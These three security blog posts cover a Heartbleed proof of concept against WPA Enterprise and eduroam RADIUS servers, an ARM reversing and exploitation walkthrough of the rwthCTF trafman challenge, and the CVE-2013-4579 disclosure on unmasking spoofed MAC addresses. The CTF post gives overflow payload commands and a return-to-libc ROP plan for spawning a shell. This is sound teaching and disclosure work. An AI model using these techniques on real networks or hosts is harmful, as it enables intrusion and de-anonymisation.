Friday, 30 May 2014

ApBleed: Heartbleed over WPA1/2 Enterprise

Tl;dr: ApBleed is my proof-of-concept to test heartbleed against wireless networks. Patches welcome.

Once the heartbleed vulnerability in OpenSSL was made public, most focused on its applicability to web servers. Other targets such as SVN servers, VPNs, etc. were also mentioned. However, there was little public discussion about the impact of heartbleed on wireless networks.

Nevertheless, it was clear heartbleed was also exploitable against WPA1/2 enterprise networks, even if it wasn't discussed as publicly as other heartbleed stories. Normally enterprise networks use one of the many EAP methods inside an SSL tunnel to authenticate users. If OpenSSL is being used, this SSL tunnel might be vulnerable to heartbleed.

Of particular interest are networks like eduroam. Eduroam is a world-wide roaming access service between research institutions. This means that I can go to a different country, see an eduroam hotspot, and connect to it using the credentials of my home institution. What's interesting is how my credentials are checked. It's done by setting up an SSL tunnel to the RADIUS server of my own institution. The eduroam network will take care of the necessary packet routing. The image below illustrates this (taken from eduroam website):


Let's assume I'm a student at lsu.edu and currently visiting an institution of utk.edu. If I now connect to an eduroam hotspot, an SSL tunnel will be set up between my device and the RADIUS server of lsu.edu (i.e. my own institution). If my credentials are valid, lsu.edu will notify utk.edu that I should be allowed on the network.

Why is this interesting for an attacker? Because the SSL tunnel is set up before user authentication, and even before you are assigned an IP. The only thing known about you is your MAC address and your "home" institution (i.e. the realm defining your home institution). Of course, an attacker can spoof both the MAC address and the home institution. The attacker only has to be within range of an eduroam hotspot, and he or she can pick any eduroam hotspot at will. The eduroam network will then forward packets to the RADIUS server the attacker specified (i.e. the realm spoofed by the attacker). This is what allows a user to directly set up an SSL tunnel with the radius server of their home institution. However, this means we can anonymously connect to any institution we want!

The guys from eduroam quickly responded to this. Hours after heartbleed got public they posted a warning on their website. One day after heartbleed, with some help from the HostApd mailing list, they had a working proof of concept to test whether institutions were vulnerable. To quote eduroam:
Following up on the heartbleed vulnerability in OpenSSL: it is confirmed that EAP-authentication in RADIUS servers is vulnerable to the attack. It is therefore extremely important to upgrade OpenSSL and restart RADIUS services as soon as possible.
The attack is feasible from any public eduroam hotspot, not just your RADIUS peers.
Federation-level admins in Europe will receive notice from the eduroam OT with a list of vulnerable realms. [..]
While the tools are not publicly available for security reasons, we're providing the service of scanning a realm list for global federation admins on their request. [..]
Though I focus on eduroam, every networking using enterprise authentication with an EAP method inside an SSL tunnel might be vulnerable to heartbleed. Nevertheless, eduroam is more interesting than your ordinary network, because it allows you to anonymously connect to any institution which has joined the eduroam federation.

Few public proof-of-concepts were available (if any at all). I can think of three reasons for this. First, not everyone was aware enterprise authentication was vulnerable to heartbleed. Second, it's a little bit harder to make a working proof-of-concept against wireless networks. Third reason might have to do with the impact of public exploits. Because authentication (and hence the SSL tunnel) takes place before getting access to a network, it's not possible to consult a certificate revocation list (CRL) or query the certificate status online (with OCSP) [eduroam]. So revoking certificates is not possible.

However, recently proof-of-concepts are being released. So it's time to release my own proof-of-concept as well :) I modified wpa_supplicant so, once connected to an AP and ready to talk to the radius server, it opens a local socket. This means you can now connect to this socket and pretend it's the RADIUS server. The big advantage of this approach is that you can use any existing heartbleed tool to test the radius server. Simply let the heartbleed tool connect to the socket created by my proof-of-concept. The code has not been tested thoroughly, but worked in all my small experiments. Get a copy of my PoC (called ApBleed) at github. Patches are welcome!

Some example outputs of running my tool:


Using existing heartbleed tools to connect to the radius server:

Sunday, 15 December 2013

Reversing and Exploiting ARM Binaries: rwthCTF Trafman

As ARM is becoming more and more popular, the need to reverse engineer ARM binaries is increasing as well. For example, nearly all mobile phones have at least one ARM processor. In this post I show how to set up a virtual ARM environment using Qemu, give an introduction to ARM assembly (while highlighting the differences with x86), show how to reverse ARM binaries, and finally demonstrate how to write basic exploits for ARM. We will use the trafman challenge of rwthCTF as an example.


Virtual ARM Environment

To start we need an environment capable of running ARM binaries. Since I didn't have an ARM machine I created a virtual ARM environment using Qemu. Qemu is similar to VirtualBox or VMWare, except that it can support multiple architectures. This allows you the emulate ARM on your default x86 or x64 machine.

First we need to know which ARM architecture to pick. Most Linux distributions support two architectures: armel and armhf. Armel supports the ARMv4 instruction set and emulates floating point operations in software, while armhf supports the ARMv7 instruction set and uses hardware floating point operations. At least that's the case for Debian, Ubuntu uses the term "armel" differently [Ubuntu FAQ, ARM FOSDEM]. In this post I will stick to Debian. Though I haven't tested this myself, it should be possible to run armel binaries on an armhf system (this should be true for both Ubuntu and Debian). For completeness, there were also the 'arm' and 'armeb' architectures, but they are no longer supported and don't appear to be used anymore. We will use the armhf architecture, in particular Debian Wheezy armhf.

Unlike x86/PC systems, ARM systems typically don't have a BIOS. This means nothing initializes the hardware, reads the first sector of the disk, or finds where to execute code from. Instead, Qemu allows you to start a system using a "-kernel" option. It loads the given binary into memory at 0x6001000 and uses a kernel calling convention to pass the commandline and the location of initrd [#IO ARM Challenge]. In practice this means we'll always have to start Qemu using a -kernel and -initrd option.

With that background we're ready to install Debian Wheezy armhf using Qemu. First create an empty directory for the virtual environment, create a virtual harddisk for Qemu, and download the appropriate initrd and vmlinux from the Debian FTP:
Note that vexpress stands for the system we will emulate, namely a Versatile Express board. We will emulate it with a cortex-a9 processor, so we pass vexpress-a9 as an argument to Qemu. Now start the installer under Qemu as follows:
  • qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.gz -append "root=/dev/mmcblk0" -drive if=sd,cache=unsafe,file=hda.img
Follow the instructions. A graphical environment is not required. After the installation we have to extract the installed initrd image, otherwise (if you use the downloaded initrd) the installer will again boot. To mount the virtual filesystem we first have to find the proper offset. Execute "file hda.img". The output should include something like "startsector 2048". The offset is now 512*2048. In case your offset is different than 2048 you will have to update the numbers in the next commands:
  • mkdir mountdir
  • mount -o loop,offset=$((512*2048)) hda.img mountdir/
  • cp mountdir/initrd.img-3.2.0-4-vexpress .
  • umount mountdir/
And now you can boot your virtual ARM environment with:

  • qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img
You should now have a working Qemu environment.


One warning: Qemu is still an emulator. When testing rare edge cases of exotic ARM instructions (which do not occur much in practice) there's always a chance the emulator is wrong.


Network Interface in Qemu

If the program you want to reverse engineer is a network service, it is convenient to be able to connect to it from your host system. This allows you to use tools on your host system to connect and exploit the binary (while debugging it in the guest system). This is especially convenient if Qemu is slow.

To enable network support we must specify a network device (NIC) that will be emulated. And we must specify the network backend that Qemu should use to interact with the emulated NIC. By default Qemu emulates an Intel e1000 PCI card with a user-mode network stack. User mode networking is great for allowing access to network resources, including the Internet. By default, however, it acts as a firewall and does not permit any incoming traffic. It also doesn't support protocols other than TCP and UDP. For example, ping won't work [WikiBooks].

The first option to allow incoming traffic is port redirection. This allows you to redirect a port on the host OS to a port on the guest OS. For debugging a simple service this is sufficient. As an example, redirecting TCP port 6666 on the host to port 8080 on the guest is done as follows:
qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img -redir tcp:6666::8080
You can now run a service on port 8080 in the Qemu guest, and connect to it from the host using port 6666. Multiple ports can be redirected. Port redirection can also be used to share folders between the guest and the host [WikiBooks]. The downside is that you cannot dynamically add new redirects once Qemu is running. Additionally, only TCP and UDP are supported.

The second option is to create a TAP interface [Tun/Tap IntroQemuWiki]. It offers very good performance and can be configured to create virtually any type of network topology. This creates a new virtual interface on your host system, and you can use this interface to communicate with the guest. To start Qemu using a TAP interface as network backend, use the following command:
qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img -net nic -net tap,ifname=qtap0
Unfortunately you will have to manually configure IP addresses (e.g. setup a DHCP server, configure DNS, configure IP forwarding/NAT, etc). I will not go into detail here. If you don't need an internet connection and only need basic communication between the host and guest, execute the following commands in the guest:
  • ip addr add 172.20.0.2/24 dev eth0
  • route add default gw 172.20.0.1 eth0
I prefer port redirection because it's easier to configure and is usually sufficient to get the job done.


Introduction to ARM Assembly

Simplified, an ARM processor can be in two modes: ARM mode and Thumb mode. When the CPU is in ARM mode it executes 32 bit ARM instructions, and when it is in Thumb mode it executes mixed 16- and 32-bit Thumb instructions. The purpose of Thumb mode is to improve code density. How to switch between ARM and Thumb mode will be explained shortly.

In both ARM and Thumb mode we have access to 16 32-bit registers called r0..r15. Special registers are:
  • r12: intra procedure register (ip)
  • r13: stack pointer (sp)
  • r14: link register (lr)
  • r15: program counter (pc)
Register r12 is sometimes used as an Intra Procedure (ip) call scratch register, meaning it holds intermediate values when a subroutine is being called. So if you see the ip register in a disassembly listing, it does not stand for instruction pointer. Finally, subroutines must preserve the contents of r4..r11 and the stack pointer r13. A few short examples:
sub sp, #8        ; sp -= 8  // allocate stack memory
add r7, sp, #0    ; r7 = sp + 0
add r7, #0        ; r7 += 0
str r0, [r7, #4]  ; *(r7 + 4) = r0 // dereference ptr
str r0, [r7, #0]  ; *(r7 + 0) = r0
nop               ; No Operation
movw r0, #33848   ; r0[0:16]  = 0x8438 // move to bottom
movt r0, #1       ; r0[16:32] = 0x1    // move to top
                  ; Now r0 contains 0x18438
Here r7 is used as a frame pointer to access local variables or function arguments. Also note that certain instructions (like add) can have three arguments (unlike the common two arguments in x86). In order to move a 32bit word in a register we need two instructions: one to set the bottom half of the register, and one to set the upper half of the register. This is a consequence of the RISC architecture of ARM: we have simple instructions that execute quickly, but must be more verbose to get stuff done.

What we called jumps in x86 lingo are called branches in ARM. For example "jmp offset" on x86 becomes "b addr" in ARM. Function calls from x86 are also called branches, in particular "call func" from x86 becomes "bl addr" in ARM. Here BL stands for Branch and Link, meaning the program counter r15 is set to addr and the link register r14 is set to the return address. This highlights an important difference with x86: in ARM the return address is not pushed on the stack by the caller. Instead, it it always saved in the link register (lr). The callee is responsible for saving the return address (generally the callee will save it on the stack).

The instructions bxblx, and bjx can be used to switch processor mode from ARM to Thumb (or reverse). There are two use cases: the target is a label or the target is a register [ARM]. In the case the target is a label, the instruction is of the form "blx addr", and the mode is always switched. In case the target is specified using a register, e.g. "blx lr", the mode will be set according to the least significant bit (LSB) of the register. Note that all ARM and Thumb instructions must be 16-bit (two bytes) aligned, thus the least significant bit (LSB) of function addresses is in fact always zero. An even address means the target code is an ARM instruction, an uneven address means it is Thumb code. For example, when the register contains the value 0x8001 the processor will switch to Thumb mode and start executing at 0x8000. The same is true when returning from a function: if the return address is even it will switch to ARM, if it is uneven it will switch to Thumb mode. Returning can be done using "pop {pc}" or "bx lr". Both instructions will set the processor context accordingly. Note that branch instructions without an "X" in them do not change processor mode.

One practical consequence of ARM vs. Thumb addresses is that we often see references to "symbol+1", indicating that the symbol is referring to a function in Thumb mode. Additionally we have to use correct addresses in our exploit: Your debugger might say a function starts at address 0x8000, but if it is a function using Thumb instructions we must actually use the address 0x8001 (depending on context). Finally we note that we can inspect the current mode in gdb by using the "i r cpsr" command. Bit 0x20 will be set if we are in Thumb mode, i.e. Thumb mode is set if (cpsr & 0x20) != 0.

Let's end with the second half of the previous example:
blx 0x82ec      ; branch to 0x82ec (and switch mode)
bl 0x8398       ; branch to 0x8298 (don't switch mode)
add r12, r12, #8, 20     ; r12 = 0x8000
                ; 0x8000 = RotateRight(8, 2*20) [ref]
mov sp, r7      ; set stack pointer to original value
pop {r7, pc}    ; restore r7 and return to caller
The first instruction branches to address 0x82ec and switches the current processor mode, with the return address saved in the lr register. In case we were executing Thumb code this return address will be uneven, otherwise it will be even. The second instruction branches to 0x8398 without switching mode (there is no x in the branch instruction). Hence the function will be executed in the mode the processor is currently in. We also have an interesting add instruction: it adds RotateRight(8, 2*20) to r12 (which is equal to 0x8000). For more background on how this constant is encoded read the ARM documentation.

If you want to understand ARM in more detail, a fun way to learn it is by making an ARM intro challenge. Essentially that means displaying cool graphics using only ARM code. The full background on how to get started is on #IO STS. Perhaps luckily, a detailed understanding is not required to reverse engineer a program and follow this guide.


Reversing the Trafman Challenge

As an example we will reverse engineer the Trafman challenge from rwthCTF (for the binary to work properly you need to create a directory called "db" next to the binary). We open the binary in IDA and see that it failed to disassemble the first instructions:


This is because start is located at the uneven address 0x880D. In other words the binary starts executing in Thumb mode at address 0x880C, but IDA thinks it starts executing at 0x880D. We fix this by selecting address 0x880C, pressing ALT+G, and changing the value to 1 (this tells IDA that Thumb code is located at this address). Now again select address 0x880C and press C to directly convert the section to code.


We see a call which initializes libc. The pointer to the main function is stored in r0. Hence main() is located at address 0x87E0 and is Thumb code. So go to address 0x87E0, press ALT+G, set value to 1, and repeat until all instructions are in Thumb. Now select all the instructions belonging to the main function and press P to create a function of this code block. We have to manually select all the instructions in the function because otherwise IDA fails to create the function for us. Rename the function to main.


With this starting point you can analyze what the binary is doing. Also remember to interact as much as possible with the application before looking at assembler code. In fact, I found one vulnerability by simply entering unusual inputs.

The binary gets its input and output using stdin and stdout, respectively. During the CTF a new executable was spawned for every new connection and its input/output was forwarded. On startup the binary asks for a username. Our first goal is to find a valid username.


We want to locate the code responsible for checking the username. To do this we find where the error message is referenced. So, open the Strings subview and double click on the "ERR Invalid User" string. Now select the name of the string (aErrInvalidUser) and press X to find all references to the string. Only one function is referencing this string, open it. After a little bit of reverse engineering we get the following:


The ASCII string "traffic_operator" is loaded and compared to the string entered by the user. Based on the result of this comparison we either get the error message or are successfully logged in. That solves our first problem: the username is traffic_operator.

Once logged in the user has three options:
  1. Get command: the user enters a file name of exactly 40 alphanumeric characters. If this file was previously added (see next point) its content is loaded and displayed to the user.
  2. Execute command: the user enters a file name of at least 40 alphanumeric characters. It creates a file with as name the 40 first characters and allows to user to write arbitrary content to it.
  3. Exit.
After testing these functions we find a buffer overflow when getting a command (i.e. when reading a file). To trigger the overflow we write a large file using the second option, and then read it using the first option. In my virtual ARM environment I used the following commands to test and trigger the vulnerability:
  • ARM host: nc -c ./trafman -l -p 8000
  • Guest OS: perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x400 ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
We will analyze the crash in more detail in the next section. First, we reverse engineer the option menu. It's easy to locate this code because it's contained in the only function that main() calls. So open main and double click on the only non-library function being called. The text-based interface shows only three options. However, when looking at the code, we see there is a hidden option. When entering 23 the address of printf is displayed:


Notice that r0 is set to 0x8FC4 which is a pointer to the ASCII string "> %p". Register r7 is initialized in the beginning of the function to 0x12010. This address contains the dynamically loaded address of printf. Hence, it will tell us where libc is located in memory.


Getting Control of the Program Counter

We know what to do to crash the program. But we don't yet know what is causing the crash, which code is responsible, and whether it's exploitable. To answer these questions we run the binary in a debugger. Executing the following commands allows us to connect to the service from our host OS yet still debug the trafman binary itself:
  • gbc nc
  • set follow-fork-mode child
  • r -c ./trafman -l -p 8000
We now trigger the crash with:
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x400 ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
This results in a segmentation fault because it's trying to execute code at 0x41414141. Executing "x/20x $sp" in gdb to dump the stack shows that it's likely a stackoverflow vulnerability. With this alone we know enough to write a functional exploit. But since we're learning ARM we will take a look at the code that is responsible for the buffer overflow. We open the function that is executed when the user selects option 1 in the menu and reverse it.


What happens here is that each byte in the file gets read using fgetc until we are at the end of the file. In every loop the new byte is saved to an array on the stack, which will eventually overflow. The function returns to the caller using a "pop {pc}" instruction. An interesting instruction here is "adds r0, #1". It adds one to the register r0, and updates the status (a.k.a. condition) flags according to the resulting value. In particular, if the result is zero (meaning r0 was -1), the zero flag will be set. Using the BNE instruction we test for the zero flag. If it is set we exit the loop. Note that more instructions can set the status flag this way, and they can be recognized using the S suffix.

So we indeed have a classic buffer overflow (without a stack canary). The return address is saved on the stack and popped on the function exit. Our first step in exploiting the binary is to find out where we have to put the return address in our file (remember that the content of the file is written to the stack and parts of it will overflow the saved return address). To quickly accomplish this we use the pattern_create tool from metasploit. We again start the binary in Qemu as follows (I won't repeat this again):
  • gbc nc
  • set follow-fork-mode child
  • r -c ./trafman -l -p 8000
On our host we execute the following commands:
  • PATRN=$(/usr/share/metasploit-framework/tools/pattern_create.rb 400)
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."'$PATRN'" ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
We let pattern_create.rb generate a unique pattern of 400 characters. As an example, a unique pattern of 20 characters would be "Aa0Aa1Aa2Aa3Aa4Aa5Aa". If we now know which bytes in this pattern get loaded in the program counter, we can let pattern_offset.rb calculate the offset where the return address is located in our file. In gdb we see it segfaults with the program counter at 0x41326a40. So we find the offset with the following command:
  • /usr/share/metasploit-framework/tools/pattern_offset.rb 41326a40
This returns 276. So we have to put the return address 276 bytes into the payload. As a quick test, execute the following command:
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x276 ."ABCD\n1\n"."a"x40 ."\n"' | nc localhost 8000
This will segfault with the program counter at "ABCD". We now need to point the program counter to code that will get us a shell. Unfortunately the binary uses both ASLR and NX, meaning it uses random addresses, and we can't execute data on the stack and/or heap.


Defeating ASLR and NX

Our goal is a return-to-libc attack. In particular we will attempt to execute system("/bin/sh"). Defeating ASLR is trivial due to the hidden menu option which prints the address of printf. Based on the address of printf we can locate the addresses of other variables and functions within the libc library. To get the address of printf and system for a specific run we execute "p printf" and "p system" in gdb. This gives:
  • system: 0x76f2aa38
  • printf: 0x76f347d4
There is one catch: gdb says these functions are located at an even address. However, the functions are actually Thumb code! So make sure that the correct processor mode is used when executing these functions (if necessary make the addresses uneven). Anyway, the hidden menu option returns an uneven address, hence to get the address of system we take the address of printf and substract 0x9D9C from it.

So we can call system, but still need to pass an argument to it. There are two steps to accomplish this, first we need to find out where in memory the string "/bin/sh" is located, then we need to find a way to put a pointer to this string into register r0 (recall that r0 contains the first argument of a function).

Finding a "/bin/sh" string it easy. Internally the system() function uses it as well, so it's located in the libc library. To quick find it execute the following in gdb:
  • find &system, +99999999, "/bin/sh"
In my particular instance this returned 0x76fc6528. So to dynamically get the address of "/bin/sh" we take the address of printf and add 0x91D53 to it (again remember that the hidden option returns the uneven address). To load this pointer into r0 with NX enabled we will use return-oriented-programming (ROP).

We will use ROP gadgets located in the libc library, because that's the only library we know the addresses of. Within the library we have to find gadgets which set r0 and let us return to the system function. To do this I transferred libc.so.6 to the host and executed:
  • arm-linux-objdump -d libc.so.6 | grep "pop.*r0.*pc"
To install the arm-linux-* tools see IO SmashTheStack. There are likely better tools to find usable gadgets, but this quick and dirty method got the job done. Important is to search for both Thumb and ARM gadgets! Forcing Thumb mode can be done using -Mforce-thumb. The most interesting gadget found was:
  • 5a7bc: pop  {r0, r4, pc}
Remark that this is ARM instruction. In objdump printf is located at 0x387d4. I found this by executing:
  • arm-linux-objdump -d libc.so.6 | grep "printf>:"
So to dynamically get the location of the gadget we take the location of printf and add 0x21FE8 to it. Good, we now have everything in place to trigger the overflow and make it execute system("/bin/sh"). Combining all findings results in the following exploit, where I wrote the nclib myself and its functionality should be self-explanatory. When executing the exploit it looks like this:


DONE. FINALLY! :D

Sunday, 10 November 2013

Unmasking a Spoofed MAC Address (CVE-2013-4579)

Update: This vulnerability has been fixed in kernel 3.8.13.16 and above.

Certain Atheros wireless drivers do not properly update the MAC address when changed (spoofed) by a user. This allows an active attacker to retrieve the original MAC address. In short, spoofing your MAC address does not always hide the original MAC address.


Background

While working on the ath9k_htc driver (used by Atheros USB WiFi donglesI noticed the driver did not properly set a spoofed MAC address. Though the device appears to use the newly assigned MAC address correctly, the flaw allows an attacker capable of injecting packets towards the target to uncover the original MAC address.

The cause of the problem lies in how the driver and hardware implement Multiple Virtual Interface (VIF) support. Using this technology a single wireless chip can listen on multiple MAC addresses. Because sending an acknowledgement to correctly received packets is done in hardware, a question that arises is how the wireless chip can quickly determine whether a wireless packet was destined for it. At first you'd think there must be some method to give the hardware a (possibly fixed length) list of MAC addresses to listen on. However, some devices uses a different strategy (and in particular Atheros devices uses this method). Their strategy is the following: the wireless chip has a register which contains the "main" hardware MAC address (mainmac), and a register containing a mask (macmask). Given an incoming frame destined for a particular mac (incmac), it sends an ACK and accepts the frame if and only if: (mainmac & macmask) == (incmac & macmask). You can see that macmask determines which bits of incmask (MAC of the packet being received) have to match those of mainmac. Essentially the macmask represents the locations where the bits of all the virtual MAC addresses are identical to the "main" hardware MAC address (mainmac).

To clarify, consider a device having two virtual interfaces, one with MAC address 72:40:a2:3f:65:5a and another one with address 8e:8e:95:cd:90:4e. In binary these MAC addresses are:
01110010 : 01000000 : 10100010 : 00111111 : 01100101 : 01011010  (72:40:a2:3f:65:5a)
10001110 : 10001110 : 10010101 : 11001101 : 10010000 : 01001110  (8e:8e:95:cd:90:4e)
Now, macmask should consist of the bits where both these MAC addresses are the same (mathematically that's the negation of the XOR). In our example the mask would be:
00000011 : 00110001 : 11001000 : 00001101 : 00001010 : 11101011  (03:31:c8:0d:0a:eb)
So the wireless chip can pick either 72:40:a2:3f:65:5a or 8e:8e:95:cd:90:4e as its main MAC address, and then set the mask to 03:31:c8:0d:0a:eb. Frames sent to either of these MAC addresses will now be accepted and acknowledged. For more details see the comments in the atheros driver source file. Unfortunately this technique has the side effect that the wireless chipset now listens on more MAC addresses then we really want, as not all bits of incoming frames are checked!

Vulnerability Details

When a MAC address is spoofed the driver does not simply update the mainmac register. Instead the mainmac register will still contain the original MAC address, and macmask will contain the bits where the original and spoofed MAC agree (see previous section). The wireless chip will acknowledge frames sent to the spoofed MAC addresses, and the operating system will include the spoofed MAC address in all packets, so everything will seem to work properly. Unfortunately this method allows an attacker to uncover the original MAC address bit by bit (given the spoofed MAC address). Specifically we can determine the value of any bit of the original MAC address as follows:
  1. Flip the bit in the spoofed MAC address and send a packet to the modified MAC address.
  2. We now have two cases:
    • The device replies with an ACK: This means the mask for this bit is zero, thus the bit in the spoofed MAC address was different than the original MAC address.
    • Device doesn't reply: This means the mask for this bit is one, so the bit we are guessing was identical to the bit in the spoofed MAC
By doing this for each bit, we eventually learn the complete original MAC address.

The vulnerability has been successfully exploited against AR7010 and AR9271 chipsets (which use the ath9k_htc driver) under following operating systems:
  • Debian 7.2.0 amd64 and i386
  • Kali 1.0.5 amd64 and i386
  • Ubuntu 13.10 amd64 and i386
The ath9k driver is not vulnerable (see comments below). The ath5k and ath10k were not tested and/or investigated. Other drivers also capable of creating multiple virtual interfaces with different MAC addresses, on a single device, might also be susceptible to the same vulnerability (so feel free test your device and post results).

Exploit

A proof of concept has been implemented in python using scapy. Given a MAC address that you suspect to be spoofed the tool will attempt to uncover the original MAC address. In case the tool returns the same MAC address as you entered, it means the target is not susceptible to the attack, or that the target is using the default MAC address of the device.

Patch

Update: I have made a patch and submitted it to the linux-wireless@vger.kernel.org mailing list (before this patch I also notified the ath9k-devel mailing list of the bug and filed a bug report for debian). The CVE ID of this bug is CVE-2013-4579.

Final Remarks

Though spoofing a MAC address can be done securely by simply updating mainmac, an attacker can use the same technique to learn that two virtual MAC addresses actually belong to the same user. So if you put up several virtual interfaces (possibly with random MAC addresses) they can be easily linked back together (again, that's if your device uses a method similar to the one described above). This flaw is inherent to usage of macmask and, at first sight, seems difficult to fix.